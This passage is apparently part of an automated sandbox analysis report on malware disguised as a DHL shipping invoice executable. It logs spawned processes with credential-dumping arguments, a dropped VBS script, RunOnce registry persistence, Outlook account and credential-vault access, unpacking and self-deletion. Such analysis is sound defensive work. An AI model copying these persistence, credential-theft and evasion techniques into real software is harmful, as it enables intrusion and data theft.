              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeReversingLabs: Detection: 34%
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeVirustotal: Detection: 45%
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile read: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_6-33207
              Source: unknownProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\vmwhb"
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\fobaczdn"
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\qipkdrohfbov"
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs"
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\vmwhb"Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\fobaczdn"Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\qipkdrohfbov"Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile written: C:\Users\user\AppData\Local\Temp\Setup.iniJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.cfgJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeUnpacked PE file: 5.2.DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeUnpacked PE file: 6.2.DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeUnpacked PE file: 7.2.DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_73A41B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_73A41B5F
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_34652806 push ecx; ret 4_2_34652819
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044693D push ecx; ret 5_2_0044694D
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DB84
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DBAC
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00451D54 push eax; ret 5_2_00451D61
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0A4
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0CC
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_00451D34 push eax; ret 6_2_00451D41
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_00444E71 push ecx; ret 6_2_00444E81
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00414060 push eax; ret 7_2_00414074
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00414060 push eax; ret 7_2_0041409C
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00414039 push ecx; ret 7_2_00414049
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_004164EB push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00416553 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00416555 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\Reprokopists43\Surra.batJump to dropped file
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsn7D60.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\Reprokopists43\Surra.batJump to dropped file
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce PocketerJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce PocketerJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce PocketerJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce PocketerJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\wscript.exeFile deleted: c:\users\user\desktop\dhl_awb_shipping_invoice_doc_010720257820020031808174cn1800301072025.bat.exeJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_004047CB
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
